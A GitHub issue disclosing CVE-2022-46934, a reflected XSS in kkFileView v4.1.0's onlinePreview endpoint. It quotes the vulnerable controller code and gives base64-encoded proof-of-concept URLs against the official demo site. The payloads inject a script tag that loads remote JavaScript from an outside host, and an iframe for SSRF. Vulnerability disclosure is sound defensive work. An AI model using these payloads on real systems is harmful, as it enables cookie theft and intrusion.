Headline
CVE-2022-46934: kkFileView XSS Vulnerability · Issue #411 · kekingcn/kkFileView
kkFileView v4.1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the url parameter at /controller/OnlinePreviewController.java.
问题描述Description
kkFileview v4.1.0存在XSS漏洞,可能导致网站cookies泄露和iframe SSRF。
kkFileview v4.1.0 has an XSS vulnerability, which may lead to the leakage of website cookies and iframe SSRF.
漏洞位置vulerable code location
kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java文件59行,"url"参数用户可控,且没有过滤特殊字符就输出到了页面
The vulnerability code is located at line 59 in kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java , The ‘url’ parameter is user-controllable, and it is output to the page without filtering special characters
@GetMapping( “/onlinePreview”)
public String onlinePreview(String url, Model model, HttpServletRequest req) {
String fileUrl;
try {
fileUrl = WebUtils.decodeUrl(url);
} catch (Exception ex) {
String errorMsg = String.format(BASE64_DECODE_ERROR_MSG, “url”);
return otherFilePreview.notSupportedFile(model, errorMsg);
}
FileAttribute fileAttribute = fileHandlerService.getFileAttribute(fileUrl, req);
model.addAttribute("file", fileAttribute);
FilePreview filePreview = previewFactory.get(fileAttribute);
logger.info("预览文件url:{},previewType:{}", fileUrl, fileAttribute.getType());
return filePreview.filePreviewHandle(fileUrl, model, fileAttribute);
}
漏洞证明PoC
官方演示站点为最新4.1.0版本,以此为演示,访问漏洞位置(url参数值需要经过base64编码):
https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PHNjcmlwdC9zcmM9aHR0cHM6Ly94c3Mucm9ja3MveHNzLmpzPi90ZXN0LnBuZw==
https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PGlmcmFtZS9zcmM9aHR0cHM6Ly91YXQtazhzLmtla2luZy5jbi8gaGVpZ2h0PTEwMDAgd2lkdGg9MTAwMD4vdGVzdC5wbmc=
The official demo site is the latest version 4.1.0. Take this as a demo to access the vulnerability location (the URL parameter value needs to be Base64 encoded and URL encoded):
https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PHNjcmlwdC9zcmM9aHR0cHM6Ly94c3Mucm9ja3MveHNzLmpzPi90ZXN0LnBuZw==
https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PGlmcmFtZS9zcmM9aHR0cHM6Ly91YXQtazhzLmtla2luZy5jbi8gaGVpZ2h0PTEwMDAgd2lkdGg9MTAwMD4vdGVzdC5wbmc=